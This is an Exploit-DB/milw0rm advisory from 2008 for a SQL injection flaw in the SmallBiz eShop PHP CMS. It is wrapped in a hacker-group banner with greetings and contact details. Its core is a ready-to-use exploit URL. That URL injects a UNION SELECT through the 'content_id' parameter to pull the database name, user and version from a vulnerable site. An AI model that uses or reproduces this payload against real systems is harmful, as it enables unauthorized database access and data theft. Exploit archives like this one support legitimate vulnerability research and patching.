SmallBiz eShop - 'content_id' SQL Injection

EDB-ID:

5443

CVE:

N/A

Author:

Stack

Type:

webapps

Platform:

PHP

Published:

2008-04-14

###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql Ä°nj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: admin@v4-team.com
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-14]